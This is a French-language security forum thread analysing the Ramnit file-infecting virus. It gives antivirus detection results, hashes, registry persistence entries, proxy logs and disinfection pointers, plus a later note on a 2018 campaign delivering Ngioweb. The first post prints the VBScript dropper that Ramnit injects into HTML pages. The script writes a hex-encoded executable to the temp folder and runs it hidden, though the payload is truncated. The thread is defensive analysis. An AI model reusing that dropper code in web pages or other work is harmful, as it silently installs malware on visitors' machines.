Ramnit.A / W32/Cosmu.A / Win32:Quolko : Virus

Message par **Malekal_morte** » 07 nov. 2010 19:24

Pour la désinfection, se reporter à cette page : https://www.malekal.com/2011/10/12/ramni ... rai-virus/

Ramnit.A (première version) est un virus au sens stricte du terme, c'est à dire qu'il infecte les fichiers exécutables.
Ramnit.A infecte les fichiers .EXE / .DLL et .HTML

Ce dernier semble moins virulant que son confrère : Virut / Virtob / Vitro.

La détection de la variante que je possède est excellente, voici les noms des détections des divers antivirus :

File name: uploaded_data
Submission date: 2010-08-03 10:12:24 (UTC)
Current status: finished
Result: 30 /42 (71.4%)
VT Community

Compact Print results
Antivirus Version Last Update Result
AhnLab-V3 2010.08.03.00 2010.08.03 Virus/Win32.Ramnit
AntiVir 8.2.4.32 2010.08.03 W32/Infector.Gen2
Antiy-AVL 2.0.3.7 2010.08.02 -
Authentium 5.2.0.5 2010.08.03 -
Avast 4.8.1351.0 2010.08.02 Win32:Quolko
Avast5 5.0.332.0 2010.08.02 Win32:Quolko
AVG 9.0.0.851 2010.08.03 Win32/Zbot.A
BitDefender 7.2 2010.08.03 Dropped:Backdoor.Bot.125603
CAT-QuickHeal 11.00 2010.08.03 W32.Ramnit.A
ClamAV 0.96.0.3-git 2010.08.03 -
Comodo 5628 2010.08.03 TrojWare.Win32.Trojan.Agent.~UL
DrWeb 5.0.2.03300 2010.08.03 Win32.Rmnet
Emsisoft 5.0.0.34 2010.07.30 Riskware.AdWare.Win32.Virtumonde!IK
eSafe 7.0.17.0 2010.08.02 -
eTrust-Vet 36.1.7757 2010.08.02 Win32/Ramnit.A
F-Prot 4.6.1.107 2010.08.03 W32/Ircnite.A.gen!Eldorado
F-Secure 9.0.15370.0 2010.08.03 Dropped:Backdoor.Bot.125603
Fortinet 4.1.143.0 2010.08.02 -
GData 21 2010.08.03 Dropped:Backdoor.Bot.125603
Ikarus T3.1.1.84.0 2010.08.03 not-a-virus:AdWare.Win32.Virtumonde
Jiangmin 13.0.900 2010.08.03 -
Kaspersky 7.0.0.125 2010.08.03 Type_Win32
McAfee 5.400.0.1158 2010.08.03 W32/Ramnit.a
McAfee-GW-Edition 2010.1 2010.08.02 Heuristic.LooksLike.Win32.SuspiciousPE.J
Microsoft 1.6004 2010.08.03 Virus:Win32/Ramnit.A
NOD32 5335 2010.08.02 Win32/Ramnit.A
Norman 6.05.11 2010.08.02 W32/Ramnit.A
nProtect 2010-08-02.02 2010.08.02 Dropped:Backdoor.Bot.125603
Panda 10.0.2.7 2010.08.02 W32/Cosmu.A
PCTools 7.0.3.5 2010.08.03 -
Prevx 3.0 2010.08.03 -
Rising 22.59.01.03 2010.08.03 Win32.Ramnit.a
Sophos 4.56.0 2010.08.03 W32/Patched-I
Sunbelt 6677 2010.08.03 Trojan.Win32.Generic!BT
SUPERAntiSpyware 4.40.0.1006 2010.08.03 -
Symantec 20101.1.1.7 2010.08.03 -
TheHacker 6.5.2.1.329 2010.08.03 -
TrendMicro 9.120.0.1004 2010.08.03 PE_RAMNIT.A
TrendMicro-HouseCall 9.120.0.1004 2010.08.03 PE_RAMNIT.A
VBA32 3.12.12.7 2010.08.02 Backdoor.IRCNite.pl
ViRobot 2010.8.3.3968 2010.08.03 -
VirusBuster 5.0.27.0 2010.08.02 Win32.Ramnit.Gen
Additional informationShow all
MD5 : 834fee3ade17da25749e190551321d92
SHA1 : 4f7378a963b849ba215f38ec15e76a0f9d631711
SHA256: ded3dae323a909c4752fa135de72cdc00ce0da3d1a5fd715fe536105a4da8cac

Le code ajouté aux fichiers HTML :

Code : Tout sélectionner

DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000001[removed]"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

La détection d'une page WEB infectée :

File name: Accueil malekal_com.htm
Submission date: 2010-11-07 18:32:48 (UTC)
Current status: queued queued analysing finished
Result: 30/ 43 (69.8%)

Compact Print results
Antivirus Version Last Update Result
AhnLab-V3 2010.11.06.01 2010.11.06 -
AntiVir 7.10.13.164 2010.11.07 HTML/Rce.Gen
Antiy-AVL 2.0.3.7 2010.11.07 -
Authentium 5.2.0.5 2010.11.07 VBS/Inor.DZ
Avast 4.8.1351.0 2010.11.07 VBS:ExeDropper-gen
Avast5 5.0.594.0 2010.11.07 VBS:ExeDropper-gen
AVG 9.0.0.851 2010.11.07 VBS/Generic
BitDefender 7.2 2010.11.07 Win32.Ramnit.C
CAT-QuickHeal 11.00 2010.11.04 -
ClamAV 0.96.2.0-git 2010.11.06 PUA.HTML.Infected.WebPage-2
Comodo 6643 2010.11.07 -
DrWeb 5.0.2.03300 2010.11.07 Trojan.Inor
Emsisoft 5.0.0.50 2010.11.07 HTML.Rce!IK
eSafe 7.0.17.0 2010.11.07 VBS.Redlof.i
eTrust-Vet 36.1.7958 2010.11.05 HTML/Ramnit!generic
F-Prot 4.6.2.117 2010.11.07 VBS/Inor.DZ
F-Secure 9.0.16160.0 2010.11.07 Win32.Ramnit.C
Fortinet 4.2.249.0 2010.11.07 VBS/Dropper.DL!tr
GData 21 2010.11.07 Win32.Ramnit.C
Ikarus T3.1.1.90.0 2010.11.07 HTML.Rce
Jiangmin 13.0.900 2010.11.07 -
K7AntiVirus 9.67.2903 2010.11.03 Trojan
Kaspersky 7.0.0.125 2010.11.07 Trojan-Dropper.VBS.Exe2Vbs.b
McAfee 5.400.0.1158 2010.11.07 W32/Ramnit.a!htm
McAfee-GW-Edition 2010.1C 2010.11.07 -
Microsoft 1.6301 2010.11.07 Virus:VBS/Ramnit.B
NOD32 5598 2010.11.07 Win32/Ramnit.A
Norman 6.06.10 2010.11.07 HTML/Ramnit.A
nProtect 2010-11-07.01 2010.11.07 -
Panda 10.0.2.7 2010.11.07 W32/Cosmu.A
PCTools 7.0.3.5 2010.11.07 Malware.Ramnit
Prevx 3.0 2010.11.07 -
Rising 22.72.04.00 2010.11.06 Dropper.Script.VBS.Fednu.a
Sophos 4.59.0 2010.11.07 VBS/Inor-AA
Sunbelt 7243 2010.11.07 Trojan.VBS.Ramnit (v)
SUPERAntiSpyware 4.40.0.1006 2010.11.07 -
Symantec 20101.2.0.161 2010.11.07 W32.Ramnit!html
TheHacker 6.7.0.1.079 2010.11.07 -
TrendMicro 9.120.0.1004 2010.11.07 HTML_RAMNIT.AL
TrendMicro-HouseCall 9.120.0.1004 2010.11.07 HTML_RAMNIT.AL
VBA32 3.12.14.1 2010.11.05 -
ViRobot 2010.10.4.4074 2010.11.07 -
VirusBuster 12.72.1.1 2010.11.07 -
Additional informationShow all
MD5 : 1f416d12ee00b2500e10a2eaa75a8475
SHA1 : 2984fbacb71d28eb921036753acd85bbd1741b00
SHA256: 68e232daf8c6f9ccf932eb3d840dacaa6a2410c614ecaaa9da8d82e11bf8db3c

Les lignes suivantes ont été ajoutés sur HijackThis :

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = http=127.0.0.1:8888;https=127.0.0.1:8888;
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
F2 - REG:system.ini: UserInit=c:\windows\system32\userinit.exe,,c:\program files\microsoft\desktoplayer.exe

Le malware lance une instance d'Internet Explorer en background

et lance des requêtes sur Google :

Code : Tout sélectionner

1289153890.751    375 192.168.1.92 TCP_MISS/200 478 GET http://www.google-analytics.com/__utm.gif?utmwv=4.8.6&utmn=1517515671&utmhn=ads.clicksor.com&utmcs=utf-8&utmsr=1096x838&utmsc=16-bit&utmul=en-us&utmje=1&utmfl=10.0%20r22&utmhid=862729793&utmr=http%3A%2F%2Fwww.trendsone.com%2F&utmp=%2FnewServing%2FsearchTrack.php%3Fnid%3D1037%26random%3D26074&utmac=UA-453142-35&utmcc=__utma%3D251001561.2006186915.1289136613.1289148018.1289153318.6%3B%2B__utmz%3D251001561.1289153318.6.6.utmcsr%3Dtrendsone.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&utmu=DB - DIRECT/74.125.43.139 image/gif
1289153938.388    272 192.168.1.92 TCP_MISS/200 478 GET http://www.google-analytics.com/__utm.gif?utmwv=4.8.6&utmn=900480859&utmhn=tu.tv&utmcs=iso-8859-1&utmsr=1096x838&utmsc=16-bit&utmul=en-us&utmje=1&utmfl=10.0%20r22&utmdt=Tu.tv%20-%20Tus%20videos%20en%20internet&utmhid=988635622&utmr=-&utmp=%2F&utmac=UA-642705-30&utmcc=__utma%3D111564033.670189319.1289144342.1289144342.1289153366.2%3B%2B__utmz%3D111564033.1289144342.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q - DIRECT/74.125.43.139 image/gif

Dans mon cas aucune connexion sur aucun C&C

En deux minutes, la machine infectée a perdu 150 Mo d'espace disque.
Et bien plus par la suite.

Dr Web CureIT (pas essayé avec Kaspersky) semble être capable de nettoyer les fichiers infectés.

fichier infecté par Ramnit.A

malekalmorte@MaK-tux:/tmp$ ls -l mbr_Ramnit.exe
-rw-r--r-- 1 malekalmorte malekalmorte 124416 7 nov. 12:57 mbr_Ramnit.exe

fichier désinfecté :

C:\Documents and Settings\Mak>dir Bureau\mbr_Ramnit.exe
Le volume dans le lecteur C n'a pas de nom.
Le numéro de série du volume est 4063-B68D

Répertoire de C:\Documents and Settings\Mak\Bureau

07/11/2010 12:57 77 312 mbr_Ramnit.exe
1 fichier(s) 77 312 octets
0 Rép(s) 5 289 340 928 octets libres

C'est bien la taille origaine de mbr.exe et surtout le fichier n'est pas corrompu est utilisable.

On voit donc que la taille de l'exe infecté a doublé, ce qui explique la perte d'espace disque.

Désinfection

Se reporter à cette page : https://www.malekal.com/2011/10/12/ramni ... rai-virus/

Message par **Malekal_morte** » 19 nov. 2010 13:51

Nouveau fichier droppé à la place de c:\program files\microsoft\desktoplayer.exe qui est maintenant c:\program files\microsoft\watermark.exe

Process:
Path: C:\WINDOWS\system32\svchost.exe
PID: 2512
Information: Generic Host Process for Win32 Services (Microsoft Corporation)
Registry Group: Winlogon
Object:
Registry key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Registry value: Userinit
New value:
Type: REG_SZ
Value: c:\windows\system32\userinit.exe,,c:\program files\microsoft\watermark.exe
Previous value:
Type: REG_SZ
Value: C:\WINDOWS\system32\userinit.exe,

La détection du dropper :

File name: file-1564487_exe
Submission date: 2010-11-19 12:41:36 (UTC)
Current status: finished
Result: 8 /43 (18.6%)

Safety score: -
Compact
Print results
Antivirus Version Last Update Result
AhnLab-V3 2010.11.19.00 2010.11.18 -
AntiVir 7.10.14.39 2010.11.19 -
Antiy-AVL 2.0.3.7 2010.11.19 -
Avast 4.8.1351.0 2010.11.19 Win32:Rootkit-gen
Avast5 5.0.594.0 2010.11.19 Win32:Rootkit-gen
AVG 9.0.0.851 2010.11.19 unknown virus Win32/DH.CAFF820391
BitDefender 7.2 2010.11.19 -
CAT-QuickHeal 11.00 2010.11.09 -
ClamAV 0.96.4.0 2010.11.19 -
Command 5.2.11.5 2010.11.19 -
Comodo 6771 2010.11.19 Heur.Suspicious
DrWeb 5.0.2.03300 2010.11.19 -
Emsisoft 5.0.0.50 2010.11.19 -
eSafe 7.0.17.0 2010.11.18 -
eTrust-Vet 36.1.7986 2010.11.19 -
F-Prot 4.6.2.117 2010.11.19 -
F-Secure 9.0.16160.0 2010.11.19 -
Fortinet 4.2.254.0 2010.11.18 -
GData 21 2010.11.19 Win32:Rootkit-gen
Ikarus T3.1.1.90.0 2010.11.19 -
Jiangmin 13.0.900 2010.11.19 -
K7AntiVirus 9.68.3021 2010.11.18 -
Kaspersky 7.0.0.125 2010.11.19 -
McAfee 5.400.0.1158 2010.11.19 Artemis!2A24E9DB1AE2
McAfee-GW-Edition 2010.1C 2010.11.19 Artemis!2A24E9DB1AE2
Microsoft 1.6402 2010.11.19 Trojan:Win32/Ramnit.A
NOD32 5633 2010.11.19 -
Norman 6.06.10 2010.11.19 -
nProtect 2010-11-19.02 2010.11.19 -
Panda 10.0.2.7 2010.11.18 -
PCTools 7.0.3.5 2010.11.19 -
Prevx 3.0 2010.11.19 -
Rising 22.74.03.08 2010.11.19 -
Sophos 4.59.0 2010.11.19 -
SUPERAntiSpyware 4.40.0.1006 2010.11.19 -
Symantec 20101.2.0.161 2010.11.19 -
TheHacker 6.7.0.1.086 2010.11.18 -
TrendMicro 9.120.0.1004 2010.11.19 -
TrendMicro-HouseCall 9.120.0.1004 2010.11.19 -
VBA32 3.12.14.2 2010.11.18 -
VIPRE 7350 2010.11.19 -
ViRobot 2010.11.19.4157 2010.11.19 -
VirusBuster 13.6.48.0 2010.11.18 -
Additional information
Show all
MD5 : 2a24e9db1ae2a14e0a861a05c15701f8
SHA1 : cbbc338e1c62a47ff91a3477b0e7e82b3b5babb7
SHA256: 0d3ec268746e7fb5e00d90c483b488aafb44d489b12cdfeed83b65205662d5d1

La détection d'un fichier infecté est correcte :

File name:
mbr.exe
Submission date: 2010-11-19 12:47:02 (UTC)
Current status: queued (#8) queued (#6) analysing finished
Result: 30/ 43 (69.8%)

Safety score: -
Compact
Print results
Antivirus Version Last Update Result
AhnLab-V3 2010.11.19.00 2010.11.18 Win32/Ramnit
AntiVir 7.10.14.39 2010.11.19 W32/Ramnit.C
Antiy-AVL 2.0.3.7 2010.11.19 -
Avast 4.8.1351.0 2010.11.19 Win32:Ramnit-F
Avast5 5.0.594.0 2010.11.19 Win32:Ramnit-F
AVG 9.0.0.851 2010.11.19 Win32/Zbot.G
BitDefender 7.2 2010.11.19 Win32.Ramnit.H
CAT-QuickHeal 11.00 2010.11.09 -
ClamAV 0.96.4.0 2010.11.19 W32.Ramnit-1
Command 5.2.11.5 2010.11.19 W32/Ramnit.D
Comodo 6771 2010.11.19 Packed.Win32.MUPX.Gen
DrWeb 5.0.2.03300 2010.11.19 -
Emsisoft 5.0.0.50 2010.11.19 Virus.Win32.Ramnit!IK
eSafe 7.0.17.0 2010.11.18 -
eTrust-Vet 36.1.7986 2010.11.19 Win32/Ramnit.C
F-Prot 4.6.2.117 2010.11.19 W32/Ramnit.D
F-Secure 9.0.16160.0 2010.11.19 Win32.Ramnit.H
Fortinet 4.2.254.0 2010.11.18 -
GData 21 2010.11.19 Win32.Ramnit.H
Ikarus T3.1.1.90.0 2010.11.19 Virus.Win32.Ramnit
Jiangmin 13.0.900 2010.11.19 Backdoor/IRCNite.wi
K7AntiVirus 9.68.3021 2010.11.18 Virus
Kaspersky 7.0.0.125 2010.11.19 Virus.Win32.Nimnul.a
McAfee 5.400.0.1158 2010.11.19 W32/NGVCK
McAfee-GW-Edition 2010.1C 2010.11.19 W32/NGVCK
Microsoft 1.6402 2010.11.19 Virus:Win32/Ramnit.I
NOD32 5633 2010.11.19 Win32/Ramnit.H
Norman 6.06.10 2010.11.19 -
nProtect 2010-11-19.02 2010.11.19 Win32.Ramnit.H
Panda 10.0.2.7 2010.11.18 W32/Cosmu.C
PCTools 7.0.3.5 2010.11.19 Malware.Ramnit
Prevx 3.0 2010.11.19 -
Rising 22.74.03.08 2010.11.19 -
Sophos 4.59.0 2010.11.19 W32/Ramnit-A
SUPERAntiSpyware 4.40.0.1006 2010.11.19 -
Symantec 20101.2.0.161 2010.11.19 W32.Ramnit.B!inf
TheHacker 6.7.0.1.086 2010.11.18 -
TrendMicro 9.120.0.1004 2010.11.19 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.11.19 -
VBA32 3.12.14.2 2010.11.18 -
VIPRE 7350 2010.11.19 Virus.Win32.Ramnit.b (v)
ViRobot 2010.11.19.4157 2010.11.19 -
VirusBuster 13.6.48.0 2010.11.18 Win32.Ramnit.Gen.2
Additional information
Show all
MD5 : fe52fb201260f9aa22070e78318e4c2a
SHA1 : a03071130db289af837a57b5187a9840cddcb3bd
SHA256: 5d3f7dede169e6c9b1e742cfb6901b452c6073b7e1cb88d8c4eb28e7286eb803

Merci angelique.

Message par **Malekal_morte** » 06 sept. 2011 15:55

Retour de Ramnit sur les forums

Ce dernier ajoute les lignes aléatoires maintenant de ce type :

O4 - HKCU\..\Run: [MtyVqlxo] C:\Users\biotope\AppData\Local\enhjglox\mtyvqlxo.exe
O4 - Startup: mtyvqlxo.exe

Les fichiers executables peuvent être endommagés, ce qui peux ouvrir une fenêtre type invite de commande NTVM.

Exemple de détection :

AhnLab-V3 2011.08.02.01 2011.08.02 Trojan/Win32.Lebag
AVG 10.0.0.1190 2011.08.02 SHeur3.CMFH
CAT-QuickHeal 11.00 2011.08.02 (Suspicious) - DNAScan
DrWeb 5.0.2.03300 2011.08.02 Trojan.DownLoader4.29266
Emsisoft 5.1.0.8 2011.08.02 Trojan.Win32.Agent2!IK
Ikarus T3.1.1.104.0 2011.08.02 Trojan.Win32.Agent2
Kaspersky 9.0.0.837 2011.08.02 Trojan.Win32.Agent2.dszx
McAfee-GW-Edition 2010.1D 2011.08.02 Heuristic.LooksLike.Win32.Suspicious.J
Microsoft 1.7104 2011.08.02 Trojan:Win32/Ramnit
Panda 10.0.3.5 2011.08.02 Trj/CI.A
Sophos 4.67.0 2011.08.02 Troj/Agent-SQJ
SUPERAntiSpyware 4.40.0.1006 2011.08.02 Trojan.Agent/Gen-Mixel
TrendMicro 9.200.0.1012 2011.08.02 PAK_Generic.001
TrendMicro-HouseCall 9.200.0.1012 2011.08.02 PAK_Generic.001
VIPRE 10044 2011.08.02 FraudTool.Win32.Krap.ek!b (v)

Message par **Malekal_morte** » 12 oct. 2011 12:53

Ramnit fait son retour: un « vrai » virus…

Message par **Malekal_morte** » 21 août 2018 12:21

D'après CheckPoint, une nouvelle campagne de Ramnit aurait lieu et la France serait touché.

: Campagne du virus Ramnit

Ce botnet utilise les fonctions suivants :

Beaucoup de samples avec des domaines différents au lieu de l'utilisation de DGA
Le C&C n'ajoute pas de module supplémentaires comme les modules VNC, vol de mot de passe, FtpGrabber
Des modules comme FTPServer, WebInjectssont empactés dans Ramnit
Mais surtout Ramnit est utilisé pour pousser un autre malware : Ngioweb

Ngioweb est un malware assez sophistiqué qui permet de transformer l'ordinateur de la victime en Proxy.

: Ngioweb permet de transformer l'ordinateur de la victime en Proxy

Ce dernier fonctionne en injectant des processus systèmes l'un après l'autre en commençant par msiexec.exe puis en terminant par svchost.exe

: Ngioweb permet de transformer l'ordinateur de la victime en Proxy

Malekal's forum

Malekal's forum